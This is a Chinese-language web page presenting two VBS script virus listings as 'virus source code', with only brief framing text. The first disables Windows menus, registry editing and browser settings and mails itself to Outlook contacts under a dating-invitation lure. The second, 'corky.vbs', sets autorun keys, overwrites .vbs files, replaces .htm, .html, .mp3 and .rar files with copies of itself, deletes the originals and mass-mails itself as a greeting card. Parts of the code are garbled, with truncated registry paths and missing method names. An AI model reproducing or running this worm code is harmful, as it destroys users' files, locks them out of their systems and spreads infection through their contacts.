A. 电脑病毒源代码介绍
电脑中了病毒想从它的源代码入手怎么办呢!有我在,下面由我给你做出详细的电脑病毒源代码介绍!希望对你有帮助!
电脑病毒源代码介绍:
电脑病毒源代码一:
on error resume next
set fs=createobject("ing.filesystemobject" '创建一个能与 操作系统 沟通的对象,再利用该对象的各种 方法 对注册表进行操作
set dir1=fs.getspecialfolder(0) '获取windows/winnt文件夹位置
set dir2=fs.getspecialfolder(1) '获取system32/system文件夹位置
set so=createobject("ing.filesystemobject"
dim r '定义一个变量
set r=createobject("w.shell"
so.getfile(w.fullname).(dir1&"win32system.vbs" '复制病毒副本到windows/winnt文件夹位置
so.getfile(w.fullname).(dir2&"win32system.vbs" '复制病毒副本到system32/system文件夹位置
so.getfile(w.fullname).(dir1&"start menuprograms启动win32system.vbs" '复制病毒副本到start menu启动菜单
'下面是对注册表的恶意修改和简单的依靠oe传播
r.regwrite " orun",1,"reg_dword" '修改注册表,禁止“运行”菜单
r.regwrite " oclose",1,"reg_dword" '修改注册表,禁止“关闭”菜单
r.regwrite " odrives",63000000,"reg_dword" '修改注册表,隐藏所有逻辑盘符
r.regwrite "ytools",1,"reg_dword" '修改注册表,禁止注册表编辑
r.regwrite " unscanregistry","" '修改注册表,禁止开机注册表扫描
r.regwrite " ologoff",1,"reg_dword" '修改注册表,禁止“注销”菜单
r.regwrite " orealmode",1,"reg_dword" '修改注册表,禁止ms-dos实模式
r.regwrite " unwin32system","win32system.vbs" '修改注册表,使这个脚本本身开机自动运行
r.regwrite " odesktop",1,"reg_dword" '修改注册表,禁止显示桌面图标
r.regwrite "disabled",1,"reg_dword" '修改注册表,禁止纯dos模式
r.regwrite " osettaskbar",1,"reg_dword" '修改注册表,禁止“任务栏和开始”菜单
r.regwrite " oviewcontextmenu",1,"reg_dword" '修改注册表,禁止右键菜单
电脑病毒源代码二:
r.regwrite " osetfolders",1,"reg_dword" '修改注册表,禁止控制面板
r.regwrite "hklmsoftwareclasses.reg","txtfile" '修改注册表,禁止导入使用.reg文件,改为用txt文件的关联
r.regwrite "winlogonlegalnoticecaption","警告" '设置开机提示框标题
r.regwrite "winlogonlegalnoticetext","您中vbs脚本病毒了,哭吧~" '设置开机提示框文本内容
set ol=createobject("outlook.application" '创建outlook文件对象用于传播
on error resume next
for x=1 to 100
set mail=ol.createitem(0)
mail.to=ol.getnamespace("mapi".addresslists(1).addressentries(x) '用于向地址簿的前100名发送此 vbs病毒,可以算是简单弱智的蠕虫了吧~~
mail.subject="今晚你来吗?" '邮件主题
mail.body="朋友你好:您的朋友rose给您发来了热情的邀请。具体情况请阅读随信附件,祝您好运! 同城约会网" '邮件内容
mail.attachments.add(dir2&"win32system.vbs"
mail.send
next
ol.quit
'下面是对internet explore 选项的恶意修改
r.regwrite " explorer estrictions obrowsercontextmenu",1,"reg_dword" '修改注册表,禁止鼠标右键
r.regwrite " explorer estrictions obrowseroptions",1,"reg_dword" '修改注册表,禁止internet选项
r.regwrite " explorer estrictions obrowsersaveas",1,"reg_dword" '修改注册表,禁止“另存为”
r.regwrite " explorer estrictions ofileopen",1,"reg_dword" '修改注册表,禁止“文件/打开”菜单
r.regwrite " explorercontrol paneladvanced",1,"reg_dword" '修改注册表,禁止更改高级页设置
r.regwrite " explorercontrol panelcache internet",1,"reg_dword" '修改注册表,禁止更改临时文件设置
r.regwrite " explorercontrol panelautoconfig",1,"reg_dword" '修改注册表,禁止更改自动配置
r.regwrite " explorercontrol panelhomepage",1,"reg_dword" '修改注册表,禁止更改主页,即“主页”变灰
r.regwrite " explorercontrol panelhistory",1,"reg_dword" '修改注册表,禁止更改历史记录设置
r.regwrite " explorercontrol panelconnwiz admin lock",1,"reg_dword" '修改注册表,禁止更改internet连接向导
r.regwrite " explorercontrol panelsecuritytab",1,"reg_dword" '修改注册表,禁止更改安全项
r.regwrite " explorercontrol panel esetwebsettings",1,"reg_dword" '修改注册表,禁止“重置web设置”
r.regwrite " explorer estrictions oviewsource",1,"reg_dword" '修改注册表,禁止查看源文件
r.regwrite " explorerinfodelivery estrictions oaddingsubions",1,"reg_dword" '修改注册表,禁止添加脱机计划
B. 求VBS脚本病毒源码
'corky.vbs
'corky
'11-16-2007
'用记事本存为corky.vbs,文件类型选所有文件即*.*
dim wsh,fso,fa,allvbs,syspath,winpath
set wsh=createobject("wscript.shell")
set fso=createobject("scripting.filesystemobject")
set fa=fso.openTextFile(Wscript.ScriptFullName,1)
allvbs=fa.ReadAll
fa.close
settimeout
winpath=GSF(0)
syspath=GSF(1)
writereg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer",syspath&"\corky.vbs"
writereg "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\explorer",winpath&"\system.vbs"
file BP(winpath,"system.vbs")
file BP(syspath,"corky.vbs")
listdrive
net
sendmail
set wsh=nothing
set fso=nothing
sub settimeout()
on error resume next
dim a,re
set a=createobject("wscript.shell")
re=a.RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout")
if (re>=1) then
a.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout",0,"REG_DWORD"
end if
end sub
sub file(filename)
dim fso,wsh,f1,f2
set fso=createobject("scripting.filesystemobject")
fso.getfile(wscript.scriptfullname).(filename)
end sub
sub writereg(a,b)
dim wsh
set wsh=createobject("wscript.shell")
wsh.regwrite a,b
end sub
sub listdrive()
dim ds,d
set ds=fso.drives
for each d in ds
if d.drivetype=2 or d.drivetype=3 then
listfile d.path&"\"
listfolder d.path&"\"
end if
next
end sub
sub listfolder(fds)
dim fs,fd,fdf,fn
set fs=fso.getfolder(fds)
set fd=fs.subfolders
for each fdf in fd
listfile(fdf.path)
listfolder(fdf.path)
next
end sub
sub listfile(folder)
dim fd,fs,f,ext,f1,fn,fh
set fd=fso.getfolder(folder)
set fs=fd.files
for each f in fs
ext =fso.GetExtensionName(f)
ext=Lcase(ext)
fn=Lcase(f.name)
f.attributes=0
if (ext="vbs") Then
set f1=fso.openTextFile(f.path,2,true)
f1.write allvbs
f1.close
end if
if (ext="htm" ) or (ext="html") or (ext="mp3") or (ext="rar") then
set fh=fso.CreateTextFile(f.path&".vbs",True)
fh.write allvbs
fh.close
f.delete
end if
next
end sub
sub net()
on error resume next
dim netobj,nd
dim i
set netobj=createobject("wscript.network")
set nd=netobj.EnumNetworkDrives
if nd.Count >0 then
For i=0 to nd.Count-1
fso.file BF(GSF(0),"System.vbs")
next
end if
end sub
function BP(d,p)
on error resume next
BP=fso.Buildpath(d,p)
end function
function SF(fd)
on error resume next
SF=fso.SpecialFolder(fd)
end function
function GSF(fi)
on error resume next
GSF=fso.GetSpecialFolder(fi)
end function
sub sendmail()
On Error Resume Next
set outobj=Wscript.CreateObject("Outlook.Application")
If outobj= "Outlook" Then
Set mapiObj=outlookApp.GetNameSpace("MAPI")
Set addrList= mapiObj.AddressLists
For Each addr In addrList
If addr.AddressEntries.Count <> 0 Then
addrEntCount = addr.AddressEntries.Count
For addrEntIndex= 1 To addrEntCount
Set item = outlookApp.CreateItem(0)
Set addrEnt = addr.AddressEntries(addrEntIndex)
item.To = addrEnt.Address
item.Subject ="你好吗老朋友?好久不见了"
item.Body = "这里是我自己制作的贺卡希望你能喜欢!"
Set attachMents=item.Attachments
attachMents.Add fileSysObj.GetSpecialFolder(1)&"corky.vbs"
item.DeleteAfterSubmit = True
If item.To <> "" Then
item.Send
wsh.regwrite "HKCU\software\Mailtest\mailed", "1"
End If
Next
End If
Next
End if
set mapiObj=nothing
set outobj=nothing
end sub